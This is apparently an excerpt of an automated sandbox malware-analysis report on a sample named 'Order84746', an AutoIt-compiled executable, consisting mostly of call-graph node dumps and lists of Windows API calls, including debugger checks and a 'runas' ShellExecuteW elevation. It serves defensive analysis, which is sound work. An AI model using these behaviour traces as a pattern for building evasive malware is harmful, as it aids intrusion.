94728->94731 94733 95378e 94731->94733 94732 8e4129 95532 8e4139 94732->95532 94733->94733 94737 8e643d __ftell_nolock 94736->94737 95742 8e4c75 
94737->95742 94739 8e6442 94751 8e3dee 94739->94751 95753 8e5928 86 API calls 94739->95753 94741 8e644f 94741->94751 95754 8e5798 88 API calls Mailbox 94741->95754 94743 8e6458 94744 8e645c GetFullPathNameW 94743->94744 94743->94751 94745 8e6a63 48 API calls 94744->94745 94746 8e6488 94745->94746 94747 8e6a63 48 API calls 94746->94747 94748 8e6495 94747->94748 94749 955dcf _wcscat 94748->94749 94750 8e6a63 48 API calls 94748->94750 94750->94751 94751->94607 94751->94615 94753 8e3ed8 94752->94753 94754 951cba 94752->94754 95791 8e4024 94753->95791 94759 8e36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94759->94622 94761 8ee8f6 94760->94761 94818 8ee906 Mailbox 94760->94818 94762 8eed52 94761->94762 94761->94818 95886 8fe3cd 335 API calls 94762->95886 94764 8e3e2a 94764->94632 94821 8e3847 Shell_NotifyIconW _memset 94764->94821 94766 8eed63 94766->94764 94767 8eed70 94766->94767 95888 8fe312 335 API calls Mailbox 94767->95888 94768 8ee94c PeekMessageW 94768->94818 94770 95526e Sleep 94770->94818 94771 8eed77 LockWindowUpdate DestroyWindow GetMessageW 94771->94764 94773 8eeda9 94771->94773 94775 9559ef TranslateMessage DispatchMessageW GetMessageW 94773->94775 94774 8eebc7 94774->94764 95887 8e2ff6 16 API calls 94774->95887 94775->94775 94777 955a1f 94775->94777 94777->94764 94778 8eed21 PeekMessageW 94778->94818 94779 8e1caa 49 API calls 94779->94818 94780 8eebf7 timeGetTime 94780->94818 94782 8ff4ea 48 API calls 94782->94818 94783 8e6eed 48 API calls 94783->94818 94784 8eed3a TranslateMessage DispatchMessageW 94784->94778 94785 955557 WaitForSingleObject 94786 955574 GetExitCodeProcess CloseHandle 94785->94786 94785->94818 94786->94818 94787 8ed7f7 48 API calls 94812 955429 Mailbox 94787->94812 94788 95588f Sleep 94788->94812 94789 8eedae timeGetTime 95889 8e1caa 49 API calls 94789->95889 94790 955733 Sleep 94790->94812 94794 955926 GetExitCodeProcess 94798 955952 CloseHandle 94794->94798 94799 95593c WaitForSingleObject 94794->94799 94796 8e2aae 311 API 
calls 94796->94818 94797 8fdc38 timeGetTime 94797->94812 94798->94812 94799->94798 94799->94818 94800 955445 Sleep 94800->94818 94801 955432 Sleep 94801->94800 94802 948c4b 108 API calls 94802->94812 94803 8e2c79 107 API calls 94803->94812 94805 9559ae Sleep 94805->94818 94806 8ece19 48 API calls 94806->94812 94810 8ed6e9 55 API calls 94810->94812 94811 8efe30 311 API calls 94811->94818 94812->94787 94812->94794 94812->94797 94812->94800 94812->94801 94812->94802 94812->94803 94812->94805 94812->94806 94812->94810 94812->94818 95891 924cbe 49 API calls Mailbox 94812->95891 95892 8e1caa 49 API calls 94812->95892 95893 8e2aae 335 API calls 94812->95893 95894 93ccb2 50 API calls 94812->95894 95895 927a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94812->95895 95896 926532 63 API calls 3 library calls 94812->95896 94817 92cc5c 86 API calls 94817->94818 94818->94768 94818->94770 94818->94774 94818->94778 94818->94779 94818->94780 94818->94782 94818->94783 94818->94784 94818->94785 94818->94788 94818->94789 94818->94790 94818->94796 94818->94800 94818->94811 94818->94812 94818->94817 94819 8ece19 48 API calls 94818->94819 94820 8ed6e9 55 API calls 94818->94820 95799 8ef110 94818->95799 95864 8f45e0 94818->95864 95881 8eeed0 335 API calls Mailbox 94818->95881 95882 8eef00 335 API calls 94818->95882 95883 8f3200 335 API calls 2 library calls 94818->95883 95884 8fe244 TranslateAcceleratorW 94818->95884 95885 8fdc5f IsDialogMessageW GetClassLongW 94818->95885 95890 948d23 48 API calls 94818->95890 94819->94818 94820->94818 94821->94632 94822->94607 94823->94620 94825 8ed7f7 48 API calls 94824->94825 94826 8e61db 94825->94826 94827 8e6009 94826->94827 94828 8e6016 __ftell_nolock 94827->94828 94829 8e6a63 48 API calls 94828->94829 94834 8e617c Mailbox 94828->94834 94831 8e6048 94829->94831 94839 8e607e Mailbox 94831->94839 94887 8e61a6 94831->94887 94832 8e614f 94833 8ece19 48 API calls 94832->94833 94832->94834 94836 8e6170 
94833->94836 94834->94652 94835 8ece19 48 API calls 94835->94839 94837 8e64cf 48 API calls 94836->94837 94837->94834 94838 8e64cf 48 API calls 94838->94839 94839->94832 94839->94834 94839->94835 94839->94838 94840 8e61a6 48 API calls 94839->94840 94840->94839 94890 8e41a9 94841->94890 94844 8e3a06 94844->94658 94847 952ff0 94848 901c9d _free 47 API calls 94847->94848 94850 952ffd 94848->94850 94851 8e4252 84 API calls 94850->94851 94852 953006 94851->94852 94852->94852 94854 8ff4ea 48 API calls 94853->94854 94855 8e6237 94854->94855 94855->94663 94857 8ed6f4 94856->94857 94859 8ed71b 94857->94859 95507 8ed764 55 API calls 94857->95507 94859->94666 94861 8ed654 94860->94861 94869 8ed67e 94860->94869 94862 8ed65b 94861->94862 94866 8ed6c2 94861->94866 94863 8ed6ab 94862->94863 94864 8ed666 94862->94864 94863->94869 95509 8fdce0 53 API calls 94863->95509 95508 8ed9a0 53 API calls __cinit 94864->95508 94866->94863 95510 8fdce0 53 API calls 94866->95510 94869->94674 94871 8e641f 94870->94871 94872 8e6406 94870->94872 94873 8e6a63 48 API calls 94871->94873 94874 8e6eed 48 API calls 94872->94874 94875 8e62d1 94873->94875 94874->94875 94876 900fa7 94875->94876 94877 900fb3 94876->94877 94878 901028 94876->94878 94885 900fd8 94877->94885 95511 907c0e 47 API calls __getptd_noexit 94877->95511 95513 90103a 59 API calls 3 library calls 94878->95513 94881 901035 94881->94680 94882 900fbf 95512 906e10 8 API calls __ftell_nolock 94882->95512 94884 900fca 94884->94680 94885->94680 94886->94719 94888 8ebdfa 48 API calls 94887->94888 94889 8e61b1 94888->94889 94889->94831 94955 8e4214 94890->94955 94895 954f73 94898 8e4252 84 API calls 94895->94898 94896 8e41d4 LoadLibraryExW 94965 8e4291 94896->94965 94900 954f7a 94898->94900 94902 8e4291 3 API calls 94900->94902 94903 954f82 94902->94903 94991 8e44ed 94903->94991 94904 8e41fb 94904->94903 94905 8e4207 94904->94905 94907 8e4252 84 API calls 94905->94907 94909 8e39fe 94907->94909 94909->94844 94914 92c396 94909->94914 94911 954fa9 
94999 8e4950 94911->94999 94913 954fb6 94915 8e4517 83 API calls 94914->94915 94916 92c405 94915->94916 95292 92c56d 94916->95292 94919 8e44ed 64 API calls 94920 92c432 94919->94920 94921 8e44ed 64 API calls 94920->94921 94922 92c442 94921->94922 94923 8e44ed 64 API calls 94922->94923 94924 92c45d 94923->94924 94925 8e44ed 64 API calls 94924->94925 94926 92c478 94925->94926 94927 8e4517 83 API calls 94926->94927 94928 92c48f 94927->94928 94929 90395c __malloc_crt 47 API calls 94928->94929 94930 92c496 94929->94930 94931 90395c __malloc_crt 47 API calls 94930->94931 94932 92c4a0 94931->94932 94933 8e44ed 64 API calls 94932->94933 94934 92c4b4 94933->94934 94935 92bf5a GetSystemTimeAsFileTime 94934->94935 94936 92c4c7 94935->94936 94937 92c4f1 94936->94937 94938 92c4dc 94936->94938 94939 92c556 94937->94939 94940 92c4f7 94937->94940 94941 901c9d _free 47 API calls 94938->94941 94943 901c9d _free 47 API calls 94939->94943 95298 92b965 94940->95298 94944 92c4e2 94941->94944 94948 92c41b 94943->94948 94946 901c9d _free 47 API calls 94944->94946 94946->94948 94947 901c9d _free 47 API calls 94947->94948 94948->94847 94949 8e4252 94948->94949 94950 8e425c 94949->94950 94952 8e4263 94949->94952 94951 9035e4 __fcloseall 83 API calls 94950->94951 94951->94952 94953 8e4272 94952->94953 94954 8e4283 FreeLibrary 94952->94954 94953->94847 94954->94953 95004 8e4339 94955->95004 94958 8e423c 94960 8e41bb 94958->94960 94961 8e4244 FreeLibrary 94958->94961 94962 903499 94960->94962 94961->94960 95012 9034ae 94962->95012 94964 8e41c8 94964->94895 94964->94896 95091 8e42e4 94965->95091 94969 8e41ec 94972 8e4380 94969->94972 94970 8e42c1 FreeLibrary 94970->94969 94971 8e42b8 94971->94969 94971->94970 94973 8ff4ea 48 API calls 94972->94973 94974 8e4395 94973->94974 94975 8e47b7 48 API calls 94974->94975 94976 8e43a1 ___crtGetEnvironmentStringsW 94975->94976 94977 8e43dc 94976->94977 94978 8e4499 94976->94978 94979 8e44d1 94976->94979 94980 8e4950 57 API calls 94977->94980 95099 8e406b 
CreateStreamOnHGlobal 94978->95099 95110 92c750 93 API calls 94979->95110 94988 8e43e5 94980->94988 94983 8e44ed 64 API calls 94983->94988 94984 8e4479 94984->94904 94986 954ed7 94987 8e4517 83 API calls 94986->94987 94989 954eeb 94987->94989 94988->94983 94988->94984 94988->94986 95105 8e4517 94988->95105 94990 8e44ed 64 API calls 94989->94990 94990->94984 94992 8e44ff 94991->94992 94993 954fc0 94991->94993 95134 90381e 94992->95134 94996 92bf5a 95269 92bdb4 94996->95269 94998 92bf70 94998->94911 95000 8e495f 94999->95000 95001 955002 94999->95001 95274 903e65 95000->95274 95003 8e4967 95003->94913 95008 8e434b 95004->95008 95007 8e4321 LoadLibraryA GetProcAddress 95007->94958 95009 8e422f 95008->95009 95010 8e4354 LoadLibraryA 95008->95010 95009->94958 95009->95007 95010->95009 95011 8e4365 GetProcAddress 95010->95011 95011->95009 95015 9034ba __fcloseall 95012->95015 95013 9034cd 95060 907c0e 47 API calls __getptd_noexit 95013->95060 95015->95013 95017 9034fe 95015->95017 95016 9034d2 95061 906e10 8 API calls __ftell_nolock 95016->95061 95031 90e4c8 95017->95031 95020 903503 95021 903519 95020->95021 95022 90350c 95020->95022 95024 903543 95021->95024 95025 903523 95021->95025 95062 907c0e 47 API calls __getptd_noexit 95022->95062 95045 90e5e0 95024->95045 95063 907c0e 47 API calls __getptd_noexit 95025->95063 95026 9034dd __fcloseall @_EH4_CallFilterFunc@8 95026->94964 95032 90e4d4 __fcloseall 95031->95032 95033 907cf4 __lock 47 API calls 95032->95033 95043 90e4e2 95033->95043 95034 90e552 95065 90e5d7 95034->95065 95035 90e559 95070 9069d0 47 API calls __malloc_crt 95035->95070 95038 90e560 95038->95034 95040 90e56f InitializeCriticalSectionAndSpinCount RtlEnterCriticalSection 95038->95040 95039 90e5cc __fcloseall 95039->95020 95040->95034 95041 907d7c __mtinitlocknum 47 API calls 95041->95043 95043->95034 95043->95035 95043->95041 95068 904e5b 48 API calls __lock 95043->95068 95069 904ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 95043->95069 
95053 90e600 __wopenfile 95045->95053 95046 90e61a 95075 907c0e 47 API calls __getptd_noexit 95046->95075 95048 90e7d5 95048->95046 95052 90e838 95048->95052 95049 90e61f 95076 906e10 8 API calls __ftell_nolock 95049->95076 95051 90354e 95064 903570 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 95051->95064 95072 9163c9 95052->95072 95053->95046 95053->95048 95077 90185b 59 API calls 2 library calls 95053->95077 95056 90e7ce 95056->95048 95078 90185b 59 API calls 2 library calls 95056->95078 95058 90e7ed 95058->95048 95079 90185b 59 API calls 2 library calls 95058->95079 95060->95016 95061->95026 95062->95026 95063->95026 95064->95026 95071 907e58 RtlLeaveCriticalSection 95065->95071 95067 90e5de 95067->95039 95068->95043 95069->95043 95070->95038 95071->95067 95080 915bb1 95072->95080 95074 9163e2 95074->95051 95075->95049 95076->95051 95077->95056 95078->95058 95079->95048 95082 915bbd __fcloseall 95080->95082 95081 915bcf 95083 907c0e __ftell_nolock 47 API calls 95081->95083 95082->95081 95084 915c06 95082->95084 95085 915bd4 95083->95085 95086 915c78 __wsopen_helper 110 API calls 95084->95086 95087 906e10 __ftell_nolock 8 API calls 95085->95087 95088 915c23 95086->95088 95090 915bde __fcloseall 95087->95090 95089 915c4c __wsopen_helper RtlLeaveCriticalSection 95088->95089 95089->95090 95090->95074 95095 8e42f6 95091->95095 95094 8e42cc LoadLibraryA GetProcAddress 95094->94971 95096 8e42aa 95095->95096 95097 8e42ff LoadLibraryA 95095->95097 95096->94971 95096->95094 95097->95096 95098 8e4310 GetProcAddress 95097->95098 95098->95096 95100 8e4085 FindResourceExW 95099->95100 95101 8e40a2 95099->95101 95100->95101 95102 954f16 LoadResource 95100->95102 95101->94977 95102->95101 95103 954f2b SizeofResource 95102->95103 95103->95101 95104 954f3f LockResource 95103->95104 95104->95101 95106 8e4526 95105->95106 95109 954fe0 95105->95109 95111 903a8d 95106->95111 95108 8e4534 95108->94988 95110->94977 95114 903a99 __fcloseall 95111->95114 95112 903aa7 95124 
907c0e 47 API calls __getptd_noexit 95112->95124 95114->95112 95115 903acd 95114->95115 95126 904e1c 95115->95126 95116 903aac 95125 906e10 8 API calls __ftell_nolock 95116->95125 95119 903ad3 95132 9039fe 81 API calls 2 library calls 95119->95132 95121 903ae2 95133 903b04 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 95121->95133 95123 903ab7 __fcloseall 95123->95108 95124->95116 95125->95123 95127 904e2c 95126->95127 95128 904e4e RtlEnterCriticalSection 95126->95128 95127->95128 95130 904e34 95127->95130 95129 904e44 95128->95129 95129->95119 95131 907cf4 __lock 47 API calls 95130->95131 95131->95129 95132->95121 95133->95123 95137 903839 95134->95137 95136 8e4510 95136->94996 95138 903845 __fcloseall 95137->95138 95139 903888 95138->95139 95140 90385b _memset 95138->95140 95142 903880 __fcloseall 95138->95142 95141 904e1c __lock_file 48 API calls 95139->95141 95164 907c0e 47 API calls __getptd_noexit 95140->95164 95143 90388e 95141->95143 95142->95136 95150 90365b 95143->95150 95146 903875 95165 906e10 8 API calls __ftell_nolock 95146->95165 95152 903676 _memset 95150->95152 95157 903691 95150->95157 95151 903681 95265 907c0e 47 API calls __getptd_noexit 95151->95265 95152->95151 95152->95157 95162 9036cf 95152->95162 95154 903686 95266 906e10 8 API calls __ftell_nolock 95154->95266 95166 9038c2 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 95157->95166 95158 9037e0 _memset 95268 907c0e 47 API calls __getptd_noexit 95158->95268 95162->95157 95162->95158 95167 902933 95162->95167 95174 90ee0e 95162->95174 95245 90eb66 95162->95245 95267 90ec87 47 API calls 3 library calls 95162->95267 95164->95146 95165->95142 95166->95142 95168 902952 95167->95168 95169 90293d 95167->95169 95168->95162 95170 907c0e __ftell_nolock 47 API calls 95169->95170 95171 902942 95170->95171 95172 906e10 __ftell_nolock 8 API calls 95171->95172 95173 90294d 95172->95173 95173->95162 95175 90ee46 95174->95175 95176 90ee2f 95174->95176 95178 90f57e 95175->95178 95183 
90ee80 95175->95183 95177 907bda __chsize_nolock 47 API calls 95176->95177 95180 90ee34 95177->95180 95179 907bda __chsize_nolock 47 API calls 95178->95179 95181 90f583 95179->95181 95182 907c0e __ftell_nolock 47 API calls 95180->95182 95185 907c0e __ftell_nolock 47 API calls 95181->95185 95225 90ee3b 95182->95225 95184 90ee88 95183->95184 95191 90ee9f 95183->95191 95186 907bda __chsize_nolock 47 API calls 95184->95186 95187 90ee94 95185->95187 95188 90ee8d 95186->95188 95189 906e10 __ftell_nolock 8 API calls 95187->95189 95192 907c0e __ftell_nolock 47 API calls 95188->95192 95189->95225 95190 90eeb4 95193 907bda __chsize_nolock 47 API calls 95190->95193 95191->95190 95194 90eece 95191->95194 95195 90eeec 95191->95195 95191->95225 95192->95187 95193->95188 95194->95190 95198 90eed9 95194->95198 95197 9069d0 __malloc_crt 47 API calls 95195->95197 95199 90eefc 95197->95199 95200 913bf2 __flswbuf 47 API calls 95198->95200 95201 90ef04 95199->95201 95202 90ef1f 95199->95202 95203 90efed 95200->95203 95204 907c0e __ftell_nolock 47 API calls 95201->95204 95206 90f82f __lseeki64_nolock 49 API calls 95202->95206 95205 90f066 ReadFile 95203->95205 95210 90f003 GetConsoleMode 95203->95210 95207 90ef09 95204->95207 95208 90f546 GetLastError 95205->95208 95209 90f088 95205->95209 95211 90ef2d 95206->95211 95212 907bda __chsize_nolock 47 API calls 95207->95212 95213 90f553 95208->95213 95214 90f046 95208->95214 95209->95208 95219 90f058 95209->95219 95215 90f063 95210->95215 95216 90f017 95210->95216 95211->95198 95217 90ef14 95212->95217 95218 907c0e __ftell_nolock 47 API calls 95213->95218 95222 907bed __dosmaperr 47 API calls 95214->95222 95227 90f04c 95214->95227 95215->95205 95216->95215 95220 90f01d ReadConsoleW 95216->95220 95217->95225 95223 90f558 95218->95223 95219->95227 95228 90f0bd 95219->95228 95229 90f32a 95219->95229 95220->95219 95221 90f040 GetLastError 95220->95221 95221->95214 95222->95227 95224 907bda __chsize_nolock 47 API calls 95223->95224 95224->95227 
95225->95162 95226 901c9d _free 47 API calls 95226->95225 95227->95225 95227->95226 95231 90f129 ReadFile 95228->95231 95237 90f1aa 95228->95237 95229->95227 95232 90f430 ReadFile 95229->95232 95233 90f14a GetLastError 95231->95233 95241 90f154 95231->95241 95236 90f453 GetLastError 95232->95236 95244 90f461 95232->95244 95233->95241 95234 90f267 95239 90f217 MultiByteToWideChar 95234->95239 95240 90f82f __lseeki64_nolock 49 API calls 95234->95240 95235 90f257 95238 907c0e __ftell_nolock 47 API calls 95235->95238 95236->95244 95237->95227 95237->95234 95237->95235 95237->95239 95238->95227 95239->95221 95239->95227 95240->95239 95241->95228 95242 90f82f __lseeki64_nolock 49 API calls 95241->95242 95242->95241 95243 90f82f __lseeki64_nolock 49 API calls 95243->95244 95244->95229 95244->95243 95246 90eb71 95245->95246 95250 90eb86 95245->95250 95247 907c0e __ftell_nolock 47 API calls 95246->95247 95248 90eb76 95247->95248 95249 906e10 __ftell_nolock 8 API calls 95248->95249 95257 90eb81 95249->95257 95251 90ebbb 95250->95251 95252 913e24 __getbuf 47 API calls 95250->95252 95250->95257 95253 902933 __ftell_nolock 47 API calls 95251->95253 95252->95251 95254 90ebcf 95253->95254 95255 90ed06 __filbuf 62 API calls 95254->95255 95256 90ebd6 95255->95256 95256->95257 95258 902933 __ftell_nolock 47 API calls 95256->95258 95257->95162 95259 90ebf9 95258->95259 95259->95257 95260 902933 __ftell_nolock 47 API calls 95259->95260 95261 90ec05 95260->95261 95261->95257 95262 902933 __ftell_nolock 47 API calls 95261->95262 95263 90ec12 95262->95263 95264 902933 __ftell_nolock 47 API calls 95263->95264 95264->95257 95265->95154 95266->95157 95267->95162 95268->95154 95272 90344a GetSystemTimeAsFileTime 95269->95272 95271 92bdc3 95271->94998 95273 903478 __aulldiv 95272->95273 95273->95271 95275 903e71 __fcloseall 95274->95275 95276 903e94 95275->95276 95277 903e7f 95275->95277 95279 904e1c __lock_file 48 API calls 95276->95279 95288 907c0e 47 API calls __getptd_noexit 95277->95288 
95281 903e9a 95279->95281 95280 903e84 95289 906e10 8 API calls __ftell_nolock 95280->95289 95290 903b0c 55 API calls 2 library calls 95281->95290 95284 903e8f __fcloseall 95284->95003 95285 903ea5 95291 903ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 95285->95291 95287 903eb7 95287->95284 95288->95280 95289->95284 95290->95285 95291->95287 95295 92c581 __tzset_nolock _wcscmp 95292->95295 95293 8e44ed 64 API calls 95293->95295 95294 92bf5a GetSystemTimeAsFileTime 95294->95295 95295->95293 95295->95294 95296 92c417 95295->95296 95297 8e4517 83 API calls 95295->95297 95296->94919 95296->94948 95297->95295 95299 92b970 95298->95299 95300 92b97e 95298->95300 95301 903499 117 API calls 95299->95301 95302 92b9c3 95300->95302 95303 903499 117 API calls 95300->95303 95314 92b987 95300->95314 95301->95300 95329 92bbe8 95302->95329 95304 92b9a8 95303->95304 95304->95302 95307 92b9b1 95304->95307 95306 92ba07 95308 92ba0b 95306->95308 95309 92ba2c 95306->95309 95311 9035e4 __fcloseall 83 API calls 95307->95311 95307->95314 95310 92ba18 95308->95310 95313 9035e4 __fcloseall 83 API calls 95308->95313 95333 92b7e5 95309->95333 95310->95314 95316 9035e4 __fcloseall 83 API calls 95310->95316 95311->95314 95313->95310 95314->94947 95316->95314 95317 92ba5a 95342 92ba8a 95317->95342 95318 92ba3a 95320 92ba47 95318->95320 95322 9035e4 __fcloseall 83 API calls 95318->95322 95320->95314 95323 9035e4 __fcloseall 83 API calls 95320->95323 95322->95320 95323->95314 95326 92ba75 95326->95314 95328 9035e4 __fcloseall 83 API calls 95326->95328 95328->95314 95330 92bc0d 95329->95330 95332 92bbf6 __tzset_nolock ___crtGetEnvironmentStringsW 95329->95332 95331 90381e __fread_nolock 64 API calls 95330->95331 95331->95332 95332->95306 95334 90395c __malloc_crt 47 API calls 95333->95334 95335 92b7f4 95334->95335 95336 90395c __malloc_crt 47 API calls 95335->95336 95337 92b808 95336->95337 95338 90395c __malloc_crt 47 API calls 95337->95338 95339 92b81c 95338->95339 95340 92bb64 47 
API calls 95339->95340 95341 92b82f 95339->95341 95340->95341 95341->95317 95341->95318 95349 92baa0 95342->95349 95343 92bb51 95375 92bd8a 95343->95375 95344 92b841 64 API calls 95344->95349 95346 92ba61 95350 92bb64 95346->95350 95349->95343 95349->95344 95349->95346 95371 92bc67 95349->95371 95379 92b942 64 API calls 95349->95379 95351 92bb71 95350->95351 95352 92bb77 95350->95352 95353 901c9d _free 47 API calls 95351->95353 95354 92bb88 95352->95354 95355 901c9d _free 47 API calls 95352->95355 95353->95352 95356 92ba68 95354->95356 95357 901c9d _free 47 API calls 95354->95357 95355->95354 95356->95326 95358 9035e4 95356->95358 95357->95356 95359 9035f0 __fcloseall 95358->95359 95360 903604 95359->95360 95361 90361c 95359->95361 95413 907c0e 47 API calls __getptd_noexit 95360->95413 95364 904e1c __lock_file 48 API calls 95361->95364 95370 903614 __fcloseall 95361->95370 95363 903609 95414 906e10 8 API calls __ftell_nolock 95363->95414 95366 90362e 95364->95366 95397 903578 95366->95397 95370->95326 95372 92bcb6 95371->95372 95373 92bc76 95371->95373 95372->95373 95380 92bd3d 95372->95380 95373->95349 95373->95373 95376 92bda8 95375->95376 95377 92bd97 95375->95377 95376->95346 95378 902aae 80 API calls 95377->95378 95378->95376 95379->95349 95381 92bd7a 95380->95381 95382 92bd69 95380->95382 95381->95372 95384 902aae 95382->95384 95385 902aba __fcloseall 95384->95385 95386 902ad4 95385->95386 95387 902aec 95385->95387 95388 902ae4 __fcloseall 95385->95388 95390 907c0e __ftell_nolock 47 API calls 95386->95390 95389 904e1c __lock_file 48 API calls 95387->95389 95388->95381 95391 902af2 95389->95391 95392 902ad9 95390->95392 95393 902957 78 API calls 95391->95393 95394 906e10 __ftell_nolock 8 API calls 95392->95394 95395 902b06 95393->95395 95394->95388 95396 902b24 RtlLeaveCriticalSection RtlLeaveCriticalSection 95395->95396 95396->95388 95398 903587 95397->95398 95399 90359b 95397->95399 95449 907c0e 47 API calls __getptd_noexit 95398->95449 95401 903597 
95399->95401 95416 902c84 95399->95416 95415 903653 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 95401->95415 95402 90358c 95450 906e10 8 API calls __ftell_nolock 95402->95450 95408 902933 __ftell_nolock 47 API calls 95409 9035b5 95408->95409 95426 90e9d2 95409->95426 95411 9035bb 95411->95401 95412 901c9d _free 47 API calls 95411->95412 95412->95401 95413->95363 95414->95370 95415->95370 95417 902cbb 95416->95417 95418 902c97 95416->95418 95422 90eb36 95417->95422 95418->95417 95419 902933 __ftell_nolock 47 API calls 95418->95419 95420 902cb4 95419->95420 95451 90af61 95420->95451 95423 9035af 95422->95423 95424 90eb43 95422->95424 95423->95408 95424->95423 95425 901c9d _free 47 API calls 95424->95425 95425->95423 95427 90e9de __fcloseall 95426->95427 95428 90e9e6 95427->95428 95429 90e9fe 95427->95429 95500 907bda 47 API calls __getptd_noexit 95428->95500 95431 90ea7b 95429->95431 95436 90ea28 95429->95436 95504 907bda 47 API calls __getptd_noexit 95431->95504 95432 90e9eb 95501 907c0e 47 API calls __getptd_noexit 95432->95501 95435 90ea80 95505 907c0e 47 API calls __getptd_noexit 95435->95505 95476 90a8ed 95436->95476 95437 90e9f3 __fcloseall 95437->95411 95440 90ea88 95506 906e10 8 API calls __ftell_nolock 95440->95506 95441 90ea2e 95443 90ea41 95441->95443 95444 90ea4c 95441->95444 95485 90ea9c 95443->95485 95502 907c0e 47 API calls __getptd_noexit 95444->95502 95447 90ea47 95503 90ea73 RtlLeaveCriticalSection __unlock_fhandle 95447->95503 95449->95402 95450->95401 95452 90af6d __fcloseall 95451->95452 95453 90af75 95452->95453 95454 90af8d 95452->95454 95456 907bda __chsize_nolock 47 API calls 95453->95456 95455 90b022 95454->95455 95460 90afbf 95454->95460 95457 907bda __chsize_nolock 47 API calls 95455->95457 95458 90af7a 95456->95458 95459 90b027 95457->95459 95461 907c0e __ftell_nolock 47 API calls 95458->95461 95462 907c0e __ftell_nolock 47 API calls 95459->95462 95463 90a8ed ___lock_fhandle 49 API calls 95460->95463 95470 90af82 __fcloseall 

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 31d5996a398bf6ae7fafa99eebaa8178d65a8ebef7a1d78b5f8d16cc8b996485
                          • Instruction ID: a0e7fef7d5b456cb6e0d6b5b7950d2f918e012abe63e930253f1ccbeb4441511
                          • Opcode Fuzzy Hash: 31d5996a398bf6ae7fafa99eebaa8178d65a8ebef7a1d78b5f8d16cc8b996485
                          • Instruction Fuzzy Hash: F8326C75B162298FDB248F54DC816E9B7B9FF8A310F1841D9E40AE7A91D7309E80CF52

                          Control-flow Graph

                          APIs
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,008E3AA3,?), ref: 008E3D45
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,008E3AA3,?), ref: 008E3D57
                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,009A1148,009A1130,?,?,?,?,008E3AA3,?), ref: 008E3DC8
                            • Part of subcall function 008E6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008E3DEE,009A1148,?,?,?,?,?,008E3AA3,?), ref: 008E6471
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,008E3AA3,?), ref: 008E3E48
                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009928F4,00000010), ref: 00951CCE
                          • SetCurrentDirectoryW.KERNEL32(?,009A1148,?,?,?,?,?,008E3AA3,?), ref: 00951D06
                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0097DAB4,009A1148,?,?,?,?,?,008E3AA3,?), ref: 00951D89
                          • ShellExecuteW.SHELL32(00000000,?,?,?,?,008E3AA3), ref: 00951D90
                            • Part of subcall function 008E3E6E: GetSysColorBrush.USER32(0000000F), ref: 008E3E79
                            • Part of subcall function 008E3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 008E3E88
                            • Part of subcall function 008E3E6E: LoadIconW.USER32(00000063), ref: 008E3E9E
                            • Part of subcall function 008E3E6E: LoadIconW.USER32(000000A4), ref: 008E3EB0
                            • Part of subcall function 008E3E6E: LoadIconW.USER32(000000A2), ref: 008E3EC2
                            • Part of subcall function 008E3E6E: RegisterClassExW.USER32(?), ref: 008E3F30
                            • Part of subcall function 008E36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008E36E6
                            • Part of subcall function 008E36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008E3707
                            • Part of subcall function 008E36B8: ShowWindow.USER32(00000000,?,?,?,?,008E3AA3,?), ref: 008E371B
                            • Part of subcall function 008E36B8: ShowWindow.USER32(00000000,?,?,?,?,008E3AA3,?), ref: 008E3724
                            • Part of subcall function 008E4FFC: _memset.LIBCMT ref: 008E5022
                            • Part of subcall function 008E4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008E50CB
                          Strings
                          • This is a third-party compiled AutoIt script., xrefs: 00951CC8
                          • runas, xrefs: 00951D84
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
